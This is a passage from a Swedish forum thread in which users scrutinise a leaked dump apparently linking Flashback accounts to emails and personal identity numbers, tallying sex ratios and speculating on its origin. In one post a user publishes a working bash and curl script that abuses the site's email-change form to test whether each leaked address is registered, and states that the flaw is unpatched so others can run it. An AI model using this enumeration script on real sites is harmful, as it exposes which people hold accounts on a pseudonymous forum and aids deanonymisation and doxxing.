Vinnaren i pepparkakshustävlingen!
  1. Dator och IT
  2. IT-säkerhet

Granskning av den släppta Flashback-dumpen

Svara
2015-02-13, 17:34
  #145
Dr.MadScience
Medlem
Dr.MadSciences avatar
Citat:
Ursprungligen postat av .Chloe
Du har helt rätt, jag har varit oklar på den punkten. Jag ville ha en terminologi-spalt med i TS men det blev inte så.

Filen "ut" ser ut så här(dock censurerad i detta fall):


Filen "ut" är 40269 rader lång, dvs lika lång som Flashback-dumpen. Filen "ut" är alltså den fil som är resultatet på hur jag gjorde för att fastställa om en e-postadress finns länkad till en användare på Flashback. Om resultatet blev "<blockquote>" så finns e-postadressen redan på Flashback, om "<blockquote>" inte finns så finns alltså inte e-postadressen på Flashback.

Jag ville inte bli för teknisk i TS, jag ville enbart dela med mig hur jag gjorde samt resultatet så en diskussion kring hela ämnet kunde skapas. Om du eller någon annan vill att jag publicerar tekniska detaljer så gör jag det gärna.
Oki, och det innebär att du har möjlighet att hyfsat enkelt avgöra om en emailaddress är flashbackreggad? Jag menar, du (ja script) testade väl inte att byta passwd/skapa nytt konto på flashback för varje av dessa tusentals emailaddresser, på så pass kort tid? Alltså, med andra ord, göra precis samma sak som RG eventuellt gjort.

För att vara lite trovärdig tycker jag att du borde iaf. ge en hint på hur du kan veta detta. Kanske är lite för mycket begärt i hacker-kretsar hehe.

Tillägg: 40000/(3 dygn * 24 timmar * 60 min) = 9 emailaddresser checkade per minut. Hmm, ja kanske inte orimligt .
__________________
Senast redigerad av Dr.MadScience 2015-02-13 kl. 18:10.
Citera
2015-02-13, 17:45
  #146
vindihavet
Medlem
Jag tror det är falskt. Dom har dragit sina uppgifter mot användarnamn och fått fram en del.
Citera
2015-02-13, 18:04
  #147
turtletoad
Medlem
Citat:
Ursprungligen postat av vindihavet
Jag tror det är falskt. Dom har dragit sina uppgifter mot användarnamn och fått fram en del.

Bevisa ditt påstående! Här räcker det inte med att tro.
ITproffs som .Chloe kan du inte köra över med "troende"!
Ett gammalt talesätt: Tro får du göra i kyrkan!

Upp till bevis! Annars är du bara en inkvoterad desinformatör.
Citera
2015-02-13, 18:07
  #148
Taiga
Medlem
Citat:
Ursprungligen postat av Schweizergarde
Har lite fler dåliga nyheter som tyder på att detta är en FB-dump.

Kollade åldersfördelningen mellan personer födda 84-89 (äldre personer är inte jätteintressant eftersom det är mer män ändå).

Jag sorterade listan efter den 10:e siffran, vilket är den som anger kön. Gjorde en COUNTA-funktion och räknade hur många det finns av varje siffra.

Jämna siffror är kvinnor medan ojämna siffror är män.

[PHP]0 576
1 3635
2 528
3 3262
4 466
5 2863
6 361
7 2424
8 342
9 2043

Totalt: 16503[/PHP]

Detta visar tydligt att det är en överrepresentation av män. För just det här aktuella utdraget är det 14% kvinnor och 86% män.

Återigen, hur många av numren i pnr-kolumnen är ens giltiga personnummer? En del tycks ju till och med innehålla bokstäver. Vidare är det väl 9:e siffran i ett 10-siffrigt personnummer som anger kön. 10:e är väl kontrollsiffran?
Citera
2015-02-13, 18:16
  #149
Segelmorot
Medlem
Segelmorots avatar
Citat:
Ursprungligen postat av 2014-12-09
I vilket program skrivs en webbspindel som söker igenom FLASHBACK för att ta ett exempel?

Det kan du göra i flera olika språk, har själv inte kört mot just Flashback men borde inte vara så svårt. Ska det gå fort använder man ett kompilerande språk med bra utbud av verktyg som kan simulera webbläsare, då kan en dator agera 50 olika webbläsare samtidigt och om det behövs med roterande IP nummer.
Citera
2015-02-13, 18:19
  #150
Schweizergarde
Medlem
Schweizergardes avatar
Citat:
Ursprungligen postat av Taiga
Återigen, hur många av numren i pnr-kolumnen är ens giltiga personnummer? En del tycks ju till och med innehålla bokstäver. Vidare är det väl 9:e siffran i ett 10-siffrigt personnummer som anger kön. 10:e är väl kontrollsiffran?

Jag tog inte med några personnummer som hade fel format, bokstäver osv.

Skrev tyvärr fel i mitt ursprungsmeddelande. Jag har sorterat det efter 9:e siffran (10:e tecknet) så det är rätt.

Hur många av personnumrena som är äkta har jag tyvärr ingen kunskap om, men det finns andra som kan kolla det som är duktiga på proxies och kan scripta mot "ratsit"-tjänster eller andra källor. Min amatörmässiga bedömning är att det är riktiga personnummer.

Det finns dock en del avvikande format, och om man kan hitta dem ur någon annan dump på nätet så kan de avslöja en del om vilka källor man kan tänkas ha:

__________________
Senast redigerad av Schweizergarde 2015-02-13 kl. 18:33.
Citera
2015-02-13, 18:20
  #151
vindihavet
Medlem
Citat:
Ursprungligen postat av turtletoad
Bevisa ditt påstående! Här räcker det inte med att tro.
ITproffs som .Chloe kan du inte köra över med "troende"!
Ett gammalt talesätt: Tro får du göra i kyrkan!

Upp till bevis! Annars är du bara en inkvoterad desinformatör.

Det är inte upp till mig att bevisa något. Tycker snarare att det är deras uppgift att bevisa om dom har något.

Jag har då inte sett något av det än.
Citera
2015-02-13, 18:22
  #152
Taiga
Medlem
Citat:
Ursprungligen postat av Schweizergarde
Jag tog inte med några personnummer som hade fel format, bokstäver osv.

Skrev tyvärr fel i mitt ursprungsmeddelande. Jag har sorterat det efter 9:e siffran (10:e tecknet) så det är rätt.

Hur många av personnumrena som är äkta har jag tyvärr ingen kunskap om, men det finns andra som kan kolla det som är duktiga på proxies och kan scripta mot "ratsit"-tjänster eller andra källor. Min amatörmässiga bedömning är att det är riktiga personnummer.

Fair enough. Jag borde nästan kunnat sluta mig till det förstnämnda bara genom att antalet träffar för varje siffra i din tabell. My bad!
Citera
2015-02-13, 18:25
  #153
roboman
Medlem
robomans avatar
Citat:
Ursprungligen postat av Cision
Hej,

Uppgifterna kommer från diverse spelföreningar som fanns 2005-2008 och år 2008 hackades ca 10-20st på ett år, personuppgifter inkl e-poster läckte ut det året, ca 30-50tusen användare sammanlagt (unika).

Tänkte att ni behövde lite historia inom Svensk hacking eftersom ni spekulerar helt fel hehe...
Syftar du på Sverok-föreningar alltså? 10-20 föreningars medlemsregister hackades och därigenom bortåt 50 000 medlemmars personuppgifter?

Vet du vilka föreningar det var i så fall? Jag kan tänka mig en större förening som jag eventuellt blivit inskriven som medlem i då jag gick på ett evenemang de anordnade. Därför undrar jag, eftersom jag finns med på listan och annars bara var med i föreningar med sisådär 5-8 medlemmar.
Citera
2015-02-13, 18:46
  #154
beaver_se
Bannlyst
Citat:
Ursprungligen postat av peterj76
Hur har de fått hela personnumret om man inte har sin epost kopplad till facebook då? Står ens HELA personnumret på facebook för den delen heller?
Är väl många företag som t.ex videouthyrare mm som just kör ditt personnummer som kundnummer. Sen är det väl bara att titta runt på vad för företag asleberg rg a-bladet och EX-pressen har ägardelar i... Nu kör väl också många tidningar med inloggning där man är tvungen att ha sitt riktiga prenumererationskonto med alla uppgifter för att kunna läsa hela artiklar och för att kunna kommentera...
Sen får vi väl inte glömma att några fiska fram Jimmie Åkessons spelmissbruk via hans bankkort... Så vill man inte bli utsatt får man tänka före och kanske undvika att använda kort hos vissa företag om möjligt.

Edit: Ser man på vilka bolag som säljer kunduppgifter så skriker min mobil från telia mest av galna försäljare, tele 2 luren är lugn och fin. Så man kanske skall undvika fasta nr där bolagen har alla ens uppgifter och då inte ens telia drar sig för att sälja mina uppgifter trots att man är en trogen kund så kan man undra vad de oseriösa bolagen gör med ens uppgifter...

Lite text om vad Jon Karlung tycker kartläggningen av användarna på Flashback
http://www.svd.se/opinion/brannpunkt/fel-att-kartlagga-de-som-skriver-anonymt_4332617.svd
__________________
Senast redigerad av beaver_se 2015-02-13 kl. 19:09.
Citera
2015-02-13, 18:48
  #155
Schweizergarde
Medlem
Schweizergardes avatar
Jag passade förresten på att titta på könsfördelningen på väldigt "gamla" personnummer. Födda 1932-1949 alltså personer som idag är 65-82 år, eller ca 58-72 år 2008.

[PHP]0 50
1 86
2 44
3 63
4 35
5 57
6 29
7 43
8 12
9 35

Totalt: 454[/PHP]

Här är könsfördelningen 37% kvinnor och 63% män.

Vi får tänka på att så här gamla personnummer är typ "statistiska outliers" och till stor sannolikhet så är de fejkade personnummer som har slinkit med. Men det pekar åtminstone på att Flashback.csv inte är en fil som av RG är 100% träffsäker utan det verkar mer vara en arbetskopia för korsreferering av något slag. Det hade varit intressant om 'glitch' visste vilket datum den skapades på RG:s webbserver.

Hursomhelst så undrar jag detta: om personnumren ovan är fejkade av användare, t ex från ett annat forum, är det en trolig fördelning att man skapar 37% kvinnor och 63% män? Eller hade det varit närmare 50/50 om man bara skrev in en random siffra? Skriver man in sin pappas eller morfars personnummer när man handlar på CDON, eller tar man helt enkelt sitt eget personnummer och "plussar på" 30 år när man reggar sig på ett forum? Varför verkar det finnas en 60/40-struktur här?

Att det finns 182 kvinnor av 40,000 användare på Flashback som var mellan 58-72 år på FB år 2008 låter inte så sannolikt iaf.

Stärker detta snarare att personnummerlistan kommer från en helt annan källa som innefattar "alla möjliga vanliga människor"? I så fall är det en ganska konstig källa som har 60/40 män-kvinnor i äldre åldrar, men 90/10 män-kvinnor i kategori 1984-1989.

Är medveten om att den här diskussionen är ganska "fringe" och snömos eftersom det känns lite avvikande att kolla på just detta segment, men hade varit intressant att höra vad ni tror.
__________________
Senast redigerad av Schweizergarde 2015-02-13 kl. 18:57.
Citera
2015-02-13, 18:51
  #156
.Chloe
Medlem
.Chloes avatar
Citat:
Ursprungligen postat av Cognitive Dissident
Klart tekniska detaljer aldrig skadar.
Men mest nyfiken på varför du bara kollade .se-domäner. Nu duger de kanske för en statistisk säkerhet, men ändå.
.se-TLDs var i stor majoritet och eftersom detta är ett svenskt forum så tyckte jag det var mest passande. Tycker ändå att resultatet talar för sig själv; dumpen är från 2007:ish.

Citat:
Ursprungligen postat av Dr.MadScience
Oki, och det innebär att du har möjlighet att hyfsat enkelt avgöra om en emailaddress är flashbackreggad? Jag menar, du (ja script) testade väl inte att byta passwd/skapa nytt konto på flashback för varje av dessa tusentals emailaddresser, på så pass kort tid? Alltså, med andra ord, göra precis samma sak som RG eventuellt gjort.
Jo, det var så jag gjorde. Tog väl en timme. Skulle gått snabbare om jag koda det i Python eller Perl. Nåväl, här kommer skriptet + förklaringen:

[PHP]while read line
do
a=$(curl -s --cookie "kakan för Flashback" --data "s=&do=updatepassword&currentpassword_md5=59bcc3ad 6775562f845953cf01624225&newpassword_md5=&newpassw ordconfirm_md5=&currentpassword=&newpassword=&newp asswordconfirm=&email="$line"&emailconfirm="$line "https://www.flashback.org/profile.php" | grep -o "<blockquote>")
echo $line "-" $a
done<email[/PHP]

Det hela sker på https://www.flashback.org/profile.php?do=editpassword - dvs den sidan där du kan byta din e-postadress. För att detta skript ska fungera så behöver du en kaka så Flashback vet att du är inloggad, dessutom behöver du veta en MD5-summa av ditt lösenord för den postas till Flashback när du vill byta e-postadress.

Koden är simpel att förstå. Den läser rad för rad ur en fil och gör sedan ett anrop mot Flashback, sedan får man resultatet tillbaka och jag fångar då in bara "<blockquote>", hittar jag inte denna sträng så kommer inget att skrivas ut.

Försöker du ändra till en e-post som redan finns på Flashback så möts du av:
Citat:
E-postadressen som du har angivit används redan. Om du har glömt ditt lösenord kan du klicka här.
HTML-koden för detta är:
HTML-kod: 
<blockquote><p>E-postadressen som du har angivit används redan. Om du har glömt ditt lösenord kan du klicka <a href="login.php?do=lostpw">här</a>.</p></blockquote>
Och som ni ser, "<blockquote>", det är därför jag greppar efter "<blockquote>", hittar jag denna tag efter en POST så vet jag att adressen finns på Flashback, hittas ingenting så skrivs ingenting ut.

Kör jag filen så skrivs det ut likt(censurerat igen):
Kod: 
tig****vete@hotmail.com - <blockquote>
mika****n@gmail.com - <blockquote>
m_****on@hotmail.com - <blockquote>
si****@hotmail.com - <blockquote>
p****0@yahoo.com - <blockquote>
Och då behöver jag bara greppa efter "<blockquote>" för då vet jag att adressen finns i Flashback.

Koden:
Kod: 
grep -v "<blockquote>" ut
Betyder att jag letar efter rader som INTE innehåller <blockquote>, dvs e-postadresser som INTE finns på Flashback. Skriver jag "wc -l" efter så betyder det att jag vill veta hur många rader utdatan gav. (-l = lines)

Eftersom det ännu inte är patchat så kan ni själva verifiera detta. Ni har koden, förklaringen samt dumpen.

Citat:
Ursprungligen postat av Dr.MadScience
Jag är inte hemma i denna del av forumet, men har förstått att .Chloe har en stor skopa med trovärdighet i bagaget. But, still...
Ja, klart att ni ska vara källkritiska! Absolut backar jag upp min fakta, t.ex, kolla ovanför.
__________________
Senast redigerad av .Chloe 2015-02-13 kl. 18:55.
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in